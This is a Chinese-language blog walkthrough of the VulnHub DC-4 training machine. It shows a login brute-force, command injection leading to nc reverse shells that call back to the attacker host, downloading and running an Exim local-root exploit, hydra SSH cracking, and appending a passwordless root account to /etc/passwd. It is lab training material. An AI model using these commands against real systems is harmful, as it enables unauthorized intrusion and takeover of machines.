

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.ico">
  <link rel="icon" type="image/png" href="/img/favicon.ico">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="r3change">
  <meta name="keywords" content="">
  <title>vulnhub-DC-4 - 博客</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.5","typing":{"enable":true,"typeSpeed":80,"cursorChar":"_","loop":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"copy_btn":true,"image_zoom":{"enable":true},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":true,"baidu":"5c0e130ed04b8f55fb9ecacc1d607489","google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>r3change's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/header.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="vulnhub-DC-4">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-01-25 21:42" pubdate>
        2021年1月25日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      819 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      10
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">vulnhub-DC-4</h1>
            
            <div class="markdown-body">
              <p>目标靶机IP地址为 192.168.93.8</p>
<p>使用Nmap进行全端口扫描</p>
<pre><code class="hljs dns">nmap -<span class="hljs-keyword">A</span> -p- <span class="hljs-number">192.168.93.8</span></code></pre>

<p><img src="/img/vulnhub/dc-4_1.png" srcset="/img/loading.gif"></p>
<p>目标开放80端口和22端口</p>
<p>浏览器访问 <code>http://192.168.93.8</code></p>
<p><img src="/img/vulnhub/dc-4_2.png" srcset="/img/loading.gif"></p>
<p>一个登录界面</p>
<p>使用 BurpSuite 抓取登录数据包进行爆破</p>
<p><img src="/img/vulnhub/dc-4_3.png" srcset="/img/loading.gif"></p>
<p>爆破成功，用户名 admin 密码 happy</p>
<p>使用账号密码登录</p>
<p><img src="/img/vulnhub/dc-4_4.png" srcset="/img/loading.gif"></p>
<p>登录进去后，就只有一个超链接，点击</p>
<p><img src="/img/vulnhub/dc-4_5.png" srcset="/img/loading.gif"></p>
<p>有三个选项，点击Run按钮后，发现执行了命令</p>
<p><img src="/img/vulnhub/dc-4_6.png" srcset="/img/loading.gif"></p>
<p>抓包修改，发现可以执行任意命令</p>
<p><img src="/img/vulnhub/dc-4_7.png" srcset="/img/loading.gif"></p>
<p>本地监听，使用nc反弹一个shell</p>
<pre><code class="hljs apache"><span class="hljs-attribute">nc</span> -lvvp <span class="hljs-number">6666</span>

<span class="hljs-attribute">nc</span> -e /bin/bash <span class="hljs-number">192.168.93.7</span> <span class="hljs-number">6666</span></code></pre>

<p><img src="/img/vulnhub/dc-4_8.png" srcset="/img/loading.gif"></p>
<p><img src="/img/vulnhub/dc-4_9.png" srcset="/img/loading.gif"></p>
<p>使用Python获取一个交互式的shell</p>
<pre><code class="hljs shell">python -c &#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</code></pre>

<p>提权方法一：</p>
<p>查找具有root权限的suid的文件</p>
<pre><code class="hljs routeros"><span class="hljs-builtin-name">find</span> / -perm <span class="hljs-attribute">-u</span>=s -type f 2&gt;/dev/<span class="hljs-literal">null</span></code></pre>

<p><img src="/img/vulnhub/dc-4_10.png" srcset="/img/loading.gif"></p>
<p>发现有 exim4，查看版本信息</p>
<pre><code class="hljs ada">exim4 <span class="hljs-comment">--version</span></code></pre>

<p><img src="/img/vulnhub/dc-4_11.png" srcset="/img/loading.gif"></p>
<p>版本 4.89，使用 searchsploit 搜索历史漏洞</p>
<pre><code class="hljs ebnf"><span class="hljs-attribute">searchsploit exim</span></code></pre>

<p><img src="/img/vulnhub/dc-4_12.png" srcset="/img/loading.gif"></p>
<p>找到一个可用于本地提权的shell脚本</p>
<p>将脚本复制到当前目录</p>
<pre><code class="hljs awk">cp <span class="hljs-regexp">/usr/</span>share<span class="hljs-regexp">/exploitdb/</span>exploits<span class="hljs-regexp">/linux/</span>local/<span class="hljs-number">46996</span>.sh .</code></pre>

<p>因为该脚本是在Windows下编写的，直接运行会报错 <code>bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory</code>，这是因为在Windows平台下，换行符是 <code>\r\n</code>，而在Linux平台下是 <code>\n</code>，将在Windows平台下编辑过的文件复制到Linux平台下 <code>\r</code> 被会解释成 <code>^M</code></p>
<p>解决办法1</p>
<pre><code class="hljs routeros">使用vim打开文件
利用命令查看文件格式 :<span class="hljs-builtin-name">set</span> ff 或 :<span class="hljs-builtin-name">set</span> fileformat
可以看到信息 <span class="hljs-attribute">fileformat</span>=dos 或 <span class="hljs-attribute">fileformat</span>=unix
利用命令修改文件格式 :<span class="hljs-builtin-name">set</span> <span class="hljs-attribute">ff</span>=unix 或 :<span class="hljs-builtin-name">set</span> <span class="hljs-attribute">fileformat</span>=unix
:wq (存盘退出)</code></pre>

<p>解决办法2</p>
<pre><code class="hljs apache"><span class="hljs-attribute">busybox</span> dos<span class="hljs-number">2</span>unix <span class="hljs-number">46996</span>.sh</code></pre>

<p>解决办法3</p>
<p>在exploit-db上找这个脚本，拿到Linux环境下面编辑</p>
<pre><code class="hljs awk">https:<span class="hljs-regexp">//</span>www.exploit-db.com<span class="hljs-regexp">/exploits/</span><span class="hljs-number">46996</span></code></pre>



<p>将脚本上传到靶机上</p>
<p>首先使用Python监听一个Web服务</p>
<pre><code class="hljs axapta">python3 -m http.<span class="hljs-keyword">server</span></code></pre>

<p>使用wget将脚本文件下载到靶机 tmp 目录</p>
<pre><code class="hljs awk">wget http:<span class="hljs-regexp">//</span><span class="hljs-number">192.168</span>.<span class="hljs-number">93.7</span>:<span class="hljs-number">8000</span><span class="hljs-regexp">/46996.sh -O /</span>tmp/<span class="hljs-number">46996</span>.sh</code></pre>

<p>赋予可执行权限</p>
<pre><code class="hljs awk">chmod +x <span class="hljs-regexp">/tmp/</span><span class="hljs-number">46996</span>.sh</code></pre>

<p>查看脚本内容，发现脚本需要接收一个 -m 参数（-m setuid 或者是-m netcat）</p>
<p>本地nc监听</p>
<pre><code class="hljs apache"><span class="hljs-attribute">nc</span> -lvvp <span class="hljs-number">8888</span></code></pre>

<p>运行脚本</p>
<pre><code class="hljs awk"><span class="hljs-regexp">/tmp/</span><span class="hljs-number">46996</span>.sh -m netcat

netcat -e <span class="hljs-regexp">/bin/</span>bash <span class="hljs-number">192.168</span>.<span class="hljs-number">93.7</span> <span class="hljs-number">8888</span></code></pre>

<p><img src="/img/vulnhub/dc-4_13.png" srcset="/img/loading.gif"></p>
<p><img src="/img/vulnhub/dc-4_14.png" srcset="/img/loading.gif"></p>
<p>提权方法二：</p>
<p>在jim用户家目录下的 backups 目录发现密码备份文件 old-passwords.bak，将这份密码文件下载下来，然后用来爆破 jim 用户的密码</p>
<pre><code class="hljs awk">hydra -l jim -P old-passwords.bak ssh:<span class="hljs-regexp">//</span><span class="hljs-number">192.168</span>.<span class="hljs-number">93.8</span></code></pre>

<p>得到用户 jim 的密码 jibril04，SSH登陆</p>
<p><img src="/img/vulnhub/dc-4_15.png" srcset="/img/loading.gif"></p>
<p>查看 <code>/var/mail/jim</code>，得到用户charles的密码 <code>^xHhA&amp;hvim0y</code></p>
<p><img src="/img/vulnhub/dc-4_16.png" srcset="/img/loading.gif"></p>
<p>切换到charles用户</p>
<pre><code class="hljs ebnf"><span class="hljs-attribute">su charles</span></code></pre>

<p>执行 <code>sudo -l</code> 命令，发现该用户可以使用无密码以root权限运行teehee</p>
<p><img src="/img/vulnhub/dc-4_17.png" srcset="/img/loading.gif"></p>
<p>查看teehee命令的用法，发现teehee的-a参数可以在文件末尾追加内容，可以利用其在 <code>/etc/passwd</code> 文件末尾添加一个用户，并指定其有root权限</p>
<p>追加内容格式</p>
<pre><code class="hljs css"><span class="hljs-selector-attr">[用户名]</span>:<span class="hljs-selector-attr">[密码]</span>:<span class="hljs-selector-attr">[UID]</span>:<span class="hljs-selector-attr">[GID]</span>:<span class="hljs-selector-attr">[身份描述]</span>:<span class="hljs-selector-attr">[主目录]</span>:<span class="hljs-selector-attr">[登录shell]</span>
<span class="hljs-selector-tag">demo</span><span class="hljs-selector-pseudo">::0</span><span class="hljs-selector-pseudo">:0</span>:::/<span class="hljs-selector-tag">bin</span>/<span class="hljs-selector-tag">bash</span></code></pre>

<p>执行命令添加用户</p>
<pre><code class="hljs awk">echo <span class="hljs-string">&quot;demo::0:0:::/bin/bash&quot;</span> | sudo teehee -a <span class="hljs-regexp">/etc/</span>passwd</code></pre>

<p><img src="/img/vulnhub/dc-4_18.png" srcset="/img/loading.gif"></p>
<p>切换用户查看flag</p>
<p><img src="/img/vulnhub/dc-4_19.png" srcset="/img/loading.gif"></p>
<p>参考</p>
<pre><code class="hljs awk">https:<span class="hljs-regexp">//m</span>p.weixin.qq.com<span class="hljs-regexp">/s/</span>Z-bxBqOPEsLu6XUFidkZ9Q - 【VulnHub-DC4】命令注入结合添加用户拿Flag</code></pre>


            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E9%9D%B6%E5%9C%BA/">靶场</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/vulnhub/">vulnhub</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/01/24/vulnhub-DC-2/">
                        <span class="hidden-mobile">vulnhub-DC-2</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    document.addEventListener('DOMContentLoaded', function() {
      window.NProgress && window.NProgress.inc();
    })
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js" ></script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>












  
    <!-- Baidu Analytics -->
    <script defer>
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?5c0e130ed04b8f55fb9ecacc1d607489";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
